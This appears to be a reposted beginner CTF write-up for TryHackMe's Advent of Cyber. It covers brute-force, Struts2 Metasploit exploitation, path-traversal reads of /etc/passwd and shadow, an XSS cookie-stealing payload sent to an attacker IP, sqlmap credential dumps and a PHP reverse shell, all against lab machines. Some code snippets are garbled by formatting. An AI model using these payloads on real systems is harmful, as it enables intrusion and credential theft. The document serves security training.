Advent of Cyber days25 THM-泓源视野

Advent of Cyber days25 THM

Good day and merry Christmas, welcome to another THM CTF write-up. This is a special event created by THM where users have to solve all 24 tasks. Also, this room is specially designed for beginners who wish to learn more about basic hacking and pentesting. The task is easy with supporting material and it good for those have absolutely zero knowledge in hacking. The write-up gonna be tedious after the THM hackback 2019, so bear with me. You can click on the permalink to locate yourself to the specific challenge. Let’s get started.

Day 1 (Task 6) – Hacking the cookie

The first task of the challenge is about hijacking the session by altering the cookie value. You need to register and login yourself first and I name this account as user mama. After that, press F12 and find the cookie.

Advent of Cyber days25 THM插图

For your information, the value is encoded with base64.

Advent of Cyber days25 THM插图1

These first few characters contain the username mama while the rest is gibberish. Now, we are going to create a longer user name like hijackingthecookie.

Advent of Cyber days25 THM插图2

By comparing the previously decoded cookie, the last 11 characters (censored) are fixed. To hijack into the mcinventory’s account, simply encode the following text.

mcinventory<the last 11 characters>

Copy the encoded text and paste on it.

Advent of Cyber days25 THM插图3

Refresh the page and you got yourself inside mcinventory account.

Advent of Cyber days25 THM插图4

Day 2 (Task 7): Directory brute-force and OSINT

This task involved two elements which are directory brute-force and OSINT. For this write-up, I’m going to use gobuster with the following command.

gobuster dir -u http://<machine IP>:3000 -w /usr/share/dirb/wordlists/common.txt
Advent of Cyber days25 THM插图5

There is one particular directory gain our interest. Visiting the hidden directory and reading the source code, we got the following.

Advent of Cyber days25 THM插图6

Time to do a little bit of OSINT. Visit the legit GitHub site and search for arctic digital design.

Advent of Cyber days25 THM插图7

We just hit the jackpot. Read the repo and you should find something interesting.

Advent of Cyber days25 THM插图8

Use the credential and login to the admin portal. Don’t forget to read the message.

Advent of Cyber days25 THM插图9

Day 3 (Task 8): Reading packet

Download the packet file and read it using the Wireshark. Read packet ID 998 for the sake of the challenge.

Advent of Cyber days25 THM插图10

Time to find something useful. To make things simple, it is good to follow the TCP stream. To do it, simply select any TCP packet, right-click and follow the TCP stream.

Advent of Cyber days25 THM插图11

All the information for the challenge is located on stream 1.

Advent of Cyber days25 THM插图12
Advent of Cyber days25 THM插图13

To crack buddy’s hashed password, simply punch in the following command. (By referring to the hashcat example, the hash is sha512crypt)

hashcat -a 0 -m 1800 hash /usr/share/wordlists/rockyou.txt

If you are running the hashcat on VM, put –force flag.

Day 4 (Task 9): Linux challenge

This task going to test your understanding of the Linux command. Refer to the supporting material if you wanted to know more. Login into the machine via SSH shell.

Task9-1: visible files

Advent of Cyber days25 THM插图14

Task9-2: Read a file

Advent of Cyber days25 THM插图15

Task9-3: File the strings

Advent of Cyber days25 THM插图16

Task9-4: Find the IP address

Advent of Cyber days25 THM插图17

Task9-5: Check user

Advent of Cyber days25 THM插图18

Task9-6: File integrity

Advent of Cyber days25 THM插图19

Task9-7: Finding the hash

For your information, all user’s hash is stored in /etc/shadow. The problem is, you can’t simply read the file due to permission issues. Sometimes, you can find the backup somewhere inside the system folder.

Advent of Cyber days25 THM插图20

We have permission to read the backup file.

Advent of Cyber days25 THM插图21

Day 5 (Task 10): OSINT

Download the picture and examine the metadata using ExifTool.

Advent of Cyber days25 THM插图22

We found a small piece of information regarding the creator’s name. A quick google search on the name yielding the following twitter page.

Advent of Cyber days25 THM插图23

Visting the WordPress by elf Lola redirect us to the following page

Advent of Cyber days25 THM插图24

Problem is, how do we know the first photograph being published by Lola? Ever heard waybackmachine where people like to dig back the old stuff. Copy and paste the link in the waybackmachine, you got the following list of the archive.

Advent of Cyber days25 THM插图25

The earliest date is on October. Click on the date and visit the archived page.

Advent of Cyber days25 THM插图26

Something is different compared to the latest one. To check with the lazy name, click onto the picture or do a reverse search using TinEye.

Advent of Cyber days25 THM插图27

Day 6 (Task 11): Extract files from the packet

Download the file and open it up with the Wireshark. Examine the UDP stream by right-clicking any DNS packet.

Advent of Cyber days25 THM插图28

Looking at streams 2,3,4 and 5, you will come across something interesting.

Advent of Cyber days25 THM插图29

The data is encoded as base16 or hex. After that, in Wireshark navigate yourself File -> Export object -> HTTP and download the two files (.zip and .jpg)

Advent of Cyber days25 THM插图30

The zip is password protected. Use fcrackzip or john to crack the password. In this case, I used the john.

zip2john christmaslists.zip > hash
john hash
Advent of Cyber days25 THM插图31

There is another file hidden inside the Tryhackme.jpg. Use steghide (without the password) to extract the file.

Advent of Cyber days25 THM插图32
Advent of Cyber days25 THM插图33

Day 7 (Task 12): Nmap

Launch your Nmap scanner with the following command

nmap -p0-1000 -A -v <machine IP>

Read all the available on the result screen and submit the answer.

Advent of Cyber days25 THM插图34

Don’t forget to check Port 999. There is something inside the server.

Day 8 (Task 13): SUID file exploit

Do the Nmap fast scan using the following command

nmap -p- -v --min-parallelism 100 <machine IP>
Advent of Cyber days25 THM插图35
Advent of Cyber days25 THM插图36

Look like we have something on port 65534, a further scan of the port is a result of open SSH. Login to the machine via SSH shell with the following command

ssh -p 65534 holly@<machine IP>

After that, search for SUID files.

find / -perm /4000 2>/dev/null
Advent of Cyber days25 THM插图37

We found something interesting on the list of finding. By checking the find SUID from GTFObin, we can escalate as user igor.

Advent of Cyber days25 THM插图38

To escalate as the root user, we need to find a suspicious SUID file. By looking at the timestamp, we found a recent SUID when the machine is created.

Advent of Cyber days25 THM插图39

Let’s run the command.

Advent of Cyber days25 THM插图40

We can literally do anything as the root by running the binary.

Day 9 (Task 14): Python requests

Visiting the website will return the JSON result. Copy the following script and run it with python.

Advent of Cyber days25 THM插图41
import requests
import json
path = "f"
value = ""
host = "https://10.10.112.87:3000/"
while 1:	response = requests.get(host + path)	dict_data = json.loads(response.text)	path = dict_data["next"]	if path == "end":	break	value = value + dict_data["value"]
print(value)
Advent of Cyber days25 THM插图42

Day 10 (Task 15): Metasploit

First of all, perform an Nmap scan and search for any possible open port.

Advent of Cyber days25 THM插图43

Look like we have the webserver running on the machine. After that, do a Nikto scan on the webserver and search for any vulnerability.

Advent of Cyber days25 THM插图44

The server is vulnerable to strutshock or CVE-2017-5638. By checking the information on the CVE, we understand that the vulnerable somehow related to the Jakarta Multipart parser in Apache Struts. Fire up our Metasploit with the following command.

msfconsole

After that search for struts2 modules.

Advent of Cyber days25 THM插图45

We have located the vulnerability. Use the module and do the following configuration.

msf5 > exploit/multi/http/struts2_content_type_ognl
msf5 > set RHOST <machine IP>msf5 > set RPORT 80
msf5 > set TARGETURI /showcase.action
msf5 > set payload linux/x86/meterpreter/reverse_tcp
msf5 > exploit
Advent of Cyber days25 THM插图46

And get the open shell. Enumerate your way to /home/santa to capture the credentials. Remember, the machine you are currently exploiting is inside a docker which means you are not entirely controlling the machine even you are a root user. There is a way to escape the docker. Visit this room to learn more.

Login to the SSH with the newly captured credentials. To extract the specific line from the file, simply input the following command.

sed '100q;d' naughty_list.txt

The above command extract the 100th line from the naughty_list.txt. Give it a try!

Day 11 (Task 16): Accessing the file system

Task 16-1: NFS

Check the NFS of the server with the following command

showmount -e <machine IP>
Advent of Cyber days25 THM插图47

To mount with the NFS, firstly create a directory named nfs after that mount the NFS with the following command.

mount <machine IP>:/opt/files /root/Desktop/THM/xmas/nfs
Advent of Cyber days25 THM插图48

Remember to unmount the nfs after you are done with the challenge.

umount -f -l nfs

Task 16-2: FTP

Visit the FTP server with the following command.

FTP <machine IP>

Log in to the server with user anonymous with a blank password.

Advent of Cyber days25 THM插图49

Download the file with get and read the txt file for the SQL username and password.

Task 16-3: MySQL

Login to the SQL server with the following command.

mysql -u <username> -h 10.10.149.117 -p<password>

Make sure the -p is stick with the password (no space). After that, navigate and read the flag with the following SQL command.

mysql > SHOW DATABASES;
mysql > USE data;
mysql > SELECT * FROM USERS
Advent of Cyber days25 THM插图50

Day 12 (Task 17): File decryption

Download and unzip the file. To do an md5 checksum on the file 1, simply use this command.

md5sum note1.txt.gpg
Advent of Cyber days25 THM插图51

Punch in the command to decrypt the gpg file

gpg note1.txt.gpg

The password is 25daysofchristmas

To decrypt the asymmetrically encrypted file with the private key, follow the following command.

openssl rsautl -decrypt -inkey private.key -in note2_encrypted.txt -out note2.txt

The password is hello.

Day 13 (Task 18): Capture the flag

This task is created by the darkstar. I named this task as CTF as it involves some enumeration, exploits and privilege escalation. You might encounter bugs while performing some recon and exploit. First and foremost, let’s do a full scan on the server with ping skip.

nmap -Pn -A -v <machine IP>
Advent of Cyber days25 THM插图52

We have two services running on the machine, specifically port 80 (HTTP) and port 3389 (RDP). Let’s do a visit to the HTTP server.

Advent of Cyber days25 THM插图53

A default windows server welcome page. Huh… nothing we can do here except brute-forcing the server. Time to fire up our gobuster

gobuster dir -u <machine IP> -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Alright, we got an interesting directory called /retro. Let’s do some reading on the blog. After a short recon, I stumbled across the following in one of the blog posts.

Advent of Cyber days25 THM插图54

It could be the password for the webserver. Actually it is, you can log in into the WordPress dashboard with username wade and the password.

Advent of Cyber days25 THM插图55

Stop right there! There is nothing you can do with the WordPress dashboard that including generates a reverse shell page. Still, remember we have one more service yet to explore, the RDP. For this task, I’m going to use remmina instead of rdesktop, this is because I faced some problems with connecting the server with rdesktop.

Using the username wade and the password you just found to log in to the RDP service.

Advent of Cyber days25 THM插图56

We are now inside the desktop. If you open up the google chrome and check on the bookmark bar, you come across a CVE number.

Advent of Cyber days25 THM插图57

After a short google search on the CVE, I came across the following gif. It explains how the exploit works. The executable is located inside the recycle bin, restore and run it. However, you will get the infamous grey ok button that stops you from proceeding with the exploit.

Advent of Cyber days25 THM插图58

A big thanks to the creator of the room, darkstar. The grey button is intentioned for the challenge. The author mentioned the chrome is installed and set as default for administrator user. Such setup causes a glitch in the Windows Server 2016. There is a consistent fix for the glitch which opens up both Chrome and IE browsers and then launches the exploit

Darkstar also mentioned there are two other usual ways on fixing the bug which is

  1. Purely luck (My situation)
  2. Spamming the okay button
Advent of Cyber days25 THM插图59

I have tested the above fix mentioned by darkstar it works like a charm.

Advent of Cyber days25 THM插图60

Day 14 (Task 19): AWS

Since we have the bucket name, it makes the thing quite simple. Visit the following URL

http://advent-bucket-one.s3.amazonaws.com/
Advent of Cyber days25 THM插图61

After that read the content inside the text file.

Advent of Cyber days25 THM插图62

Day 15 (Task 20): Local file inclusion (LFI)

Visit the website and look at the source code.

Advent of Cyber days25 THM插图63

Look like the server pulling the text file from view/notes directory. Take note to the URL directory which in charge of pulling the file, /get-file/. We need to draft a URL for pulling the /etc/passwd from the server.

http://<machine IP>/get-file/../../../../../../../../../etc/passwd

Put the return directory symbol (../) as much as you like, the more the better. we are doing directory traverse now.

Advent of Cyber days25 THM插图64

We have a situation right now. To bypass the filter, try URL encoding by changing the ‘/’ into %2f.

http://<machine IP>/get-file/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
Advent of Cyber days25 THM插图65

Now we talking. Find charlie’s hash file from the shadow file.

Advent of Cyber days25 THM插图66

Copy the hash and crack it using hashcat.

hashcat -a 0 -m 1800 hash /usr/share/wordlists/rockyou.txt --force
Advent of Cyber days25 THM插图67

After cracking the hash, login to user Charlie’s ssh shell and capture the flag.

Advent of Cyber days25 THM插图68

Day 16 (Task 21): Python file system

You are required to write a python to unzip, calculate and find the content of files. Make sure you understand the code.

Task 21-1: Count the number of the unzipped file

The following is the python code for the task.

import zipfile
import os
count = 0
#Extract the primary file
with zipfile.ZipFile('final-final-compressed.zip','r') as zip_decom1:	zip_decom1.extractall('decom1')
#read and extract each zip file to decom2
ListFile = os.listdir('decom1')
for l in ListFile:	with zipfile.ZipFile('decom1/' + l,'r') as zip_decom2:	zip_decom2.extractall('decom2')
# calculate the number of file (exclude .zip)
ListFile = os.listdir('decom2')
for l in ListFile:	if 'zip' not in l:	count = count + 1
print("Number of extracted file: " + str(count))

Task 21-2: Find the file with specific metadata

This task requires the challenger to find the number of files labeled with Version 1.1.

mport os
import exiftool
m_count = 0
file = []
# Read all the metadata in decom2 and scan for 'version 1.1' metadata
ListFile = os.listdir('./')
for l in ListFile: file.append(l)
with exiftool.ExifTool() as et: metadata = et.get_metadata_batch(file)
for d in metadata: try: if(d[u'XMP:Version']): m_count = m_count + 1 except: continue
print("Number of files in version 1.1: " + str(m_count))

Put the script inside the decom2 directory.

Task 21-3: Find the file with specific content

Your task is to find the file with the string, ‘password’.

import os
# read all file in decom 2 and find the file with 'password'
ListFile = os.listdir('decom2')
for l in ListFile:	f = open('decom2/' + l,'r')	data = f.read()	f.close()	if "password" in data:	print(l)

Day 17 (Task 22): Hydra

Task 22-1: Brute-force the HTTP-post-form

The hint is a joke, do not trust it. The password is located around 900k+ in rockyou.txt. I will make another exception for this task by revealing the password.

hydra -l molly -p joyness1994 <machine IP> http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"
Advent of Cyber days25 THM插图69
Advent of Cyber days25 THM插图70

Login molly’s credentials on the webpage and capture the flag.

Advent of Cyber days25 THM插图71

Task 22-2: Brute-force the SSH

Use the following command to brute-force the SSH service.

hydra -t 64 -l molly -P /usr/share/wordlists/rockyou.txt ssh://<machine IP>
Advent of Cyber days25 THM插图72

Login into the server and capture the flag.

Advent of Cyber days25 THM插图73

Day 18 (Task 23): Stealing the cookie

There is a lot of ways of solving this task. As for my approach, I’m going to create a PHP script and steal the admin cookie. For the sake of simplicity, the script only contains one single line and extremely unrealistic.

<?php $cookie = $_GET["c"];
?>

After that, launch the PHP server (run the command inside the directory contains the PHP script) to listen to any incoming request.

php -S <tun IP>:8000

make sure you change the tun IP according to your own VPN IP in THM. After that , register yourself in the webserver and inject the following script in the comment section.

<script>document.location='https://<tun IP>:8000/cookie.php?c='+document.cookie;</script>

Change the tunnel IP too.

Advent of Cyber days25 THM插图74

Wait for 2 minutes and the admin ‘s cookie will show in front of your screen.

Advent of Cyber days25 THM插图75

Day 19 (Task 24): Command injection

Almost similar to the local file inclusion (task 20), you gonna play around with the URL. For starter, let’s test the injection with the following URL.

http:/<machine IP>:3000/api/cmd/ls
Advent of Cyber days25 THM插图76

The result contains a list of the main file system directory. By doing a small recon, the flag is located at /home/bestadmin

Advent of Cyber days25 THM插图77

Read the file and capture the flag.

Advent of Cyber days25 THM插图78

Day 20 (Task 25): Cronjob

First and foremost, do a Nmap scan.

nmap -p4000-5000 -A -v <machine IP>
Advent of Cyber days25 THM插图79

Look like we have port 4567 (SSH) service running on the machine. As for the next task, we need to brute force the service with username sam.

hydra -s 4567 -t 64 -l sam -P /usr/share/wordlists/rockyou.txt ssh://<machine IP>
Advent of Cyber days25 THM插图80

We got the password. Time to login to the shell.

Advent of Cyber days25 THM插图81

There is one particular script in /home/scripts that raises suspicion to us. Let’s read the content.

Advent of Cyber days25 THM插图82

The script just doing some cleaning on the /tmp. How does it look suspicious? Let’s check the timestamp of /tmp.

Advent of Cyber days25 THM插图83

Did you see the time differences? It is very close. My hypothesis is the clean_up.sh is inside the cronjob list from the user ubuntu. Let’s see what is our permission on the script.

Advent of Cyber days25 THM插图84

Well, we can temper the script as a low-privilege user. For your information, you can’t privilege escalate as the root user yet because the file belongs to ubuntu. You can use the following command to pull the flag from the ubuntu.

echo "cat /home/ubuntu/flag2.txt > /home/scripts/flag2.txt" > clean_up.sh
Advent of Cyber days25 THM插图85

Day 21 (Task 26): Reverse engineering (basic)

I’m going to use IDA reverse engineering tool for the entire RE challenge. You can refer to my ELF RE write-up to know more about IDA. Check challenge1 for the challenge. file1 is a decoy.

Task 26-1: static analysis

Advent of Cyber days25 THM插图86

Task 26-2: Debugging 1

Put a breakpoint (Pressing F2) after imul instruction.

Advent of Cyber days25 THM插图87

Run the program (green play button) and hover to the eax register for the answer.

Task 26-3: Debugging 2

Put a breakpoint (Pressing F2) before the pop instruction.

Advent of Cyber days25 THM插图88

Run the program (green play button) and hover to the var_4 or eax for the answer.

Day 22 (Task 27): Reverse engineering (conditional)

This RE task involved with if conditional sentence.

Advent of Cyber days25 THM插图89

The branch translated as

var_8 = 8
var_4 = 2
if (var_8 < var_4)
{ var_4 += 7
}
else
{ var_8 += 1
}

Since var_8 is always bigger than var_4, it made the if statement false. The branch will follow the red wire. By wrapping this up, you should get the answers.

Day 23 (Task 29): SQL injection

For this SQli, I’m going for the easy way. First and foremost, Launch the burp suite and visit the LapLand login page. After that, try to login as a random user (invalid credential) and capture the request from the burp suite.

Advent of Cyber days25 THM插图90

Copy the request and save it as r.txt. After that, run the following command to initiate the injection to find out the list of the possible database.

sqlmap -r r.txt --dbs --batch
Advent of Cyber days25 THM插图91
Advent of Cyber days25 THM插图92

We got one particular parameter that is vulnerable to the injection. After a short run, we are able to determine the databases. The next step is to list all the tables inside the database (name censored) with the following command.

sqlmap -r r.txt -D <Censored Db name> --table --batch
Advent of Cyber days25 THM插图93

Looks like we found a list of tables. For this time being, we are only interested in the last table. As for the next step, enumerate the content inside the table.

sqlmap -r r.txt -D <Censored Db name> -T <Censored table name> --column --batch
Advent of Cyber days25 THM插图94

Let’s pull some data from the column. You are required to use –dump.

sqlmap -r r.txt -D <Censored DB name> -T <Censored table name> -C email,username,password --batch --dump
Advent of Cyber days25 THM插图95

We just found Santa’s email and hashed password from the database. I strongly recommend you to skip the hash cracking part. Simply copy Santa’s MD5 hash and crack it using the online tool. Now, we are able to login to Santa’s social account.

Advent of Cyber days25 THM插图96

By the way, there is one secret inside Santa’s inbox.

Advent of Cyber days25 THM插图97

Alright, time to reverse the shell. Firstly, download the PHP reverse shell payload via this page. Save the file as .phtml instead of .php as the standard PHP filename has been filtered by the page. Before upload and submit the payload, make sure you have the listener opened in your terminal.

nc -lvnp 1234

After uploading the file, locate the following URL.

http://<machine IP>/assets/images/posts/
Advent of Cyber days25 THM插图98

Click on the .phtml file we just uploaded and listen to the shell.

Advent of Cyber days25 THM插图99

The flag is located at /home/user

Advent of Cyber days25 THM插图100

Day 24: ELF (Elastic Search, Kibana and Log Stash )

First and foremost, launch your Nmap scanner.

Looks like we found Port 22 (SSH), Port 8000 (HTTP) and Port 9200 (Elasticsearch) on the target machine. For your information, you can’t log in to the SSH and the only way in is Port 8000 and Port 9200. Let’s do a check on Port 9200.

There is one good material to kick start with the port 9200. To pull the password from the database, simply do a query search.

http://<machine IP>:9200/_search?q=password 
Advent of Cyber days25 THM插图101

There is nothing you can do with the credential, let’s proceed to port 8000. In the port, there is something called the Kibana log. By looking at the log, I stumbled across another open service on port 5601

Advent of Cyber days25 THM插图102

After doing the Nmap scan, port 5601 can be accessed via the browser.

Advent of Cyber days25 THM插图103

Let’s check the version in the management tab.

Advent of Cyber days25 THM插图104

After doing a quick google search on the Kibana version, I came across the LFI attack CVE-2018-17246. I try to locate the following payload address to validate vulnerably.

http://<machine IP>:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../../../../../../../etc/passwd

After that, revisit the log file from port 8000, you will notice something interesting.

Advent of Cyber days25 THM插图105

We just read the content from /etc/passwd. This vulnerable is valid. As for the flag, it is located at the root file system (Not in the /root directory).

http://<machine IP>:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../../../../../../../root.txt
Advent of Cyber days25 THM插图106

It is hard to locate the flag as it only contains a few letters. Well, actually there are other ways by using the console.

Conclusion

This is it, congratulation on completing all 24 tasks. What a challenge! A big thanks to the THM and the task creators who create those challenges we didn’t deserve for. Good job and keep on keeping on, I look forward to the next cyber advent challenge. Until next time ^^ and happy new year.

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。
30

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8238379 位访客, 您的IP是:[44.211.58.249]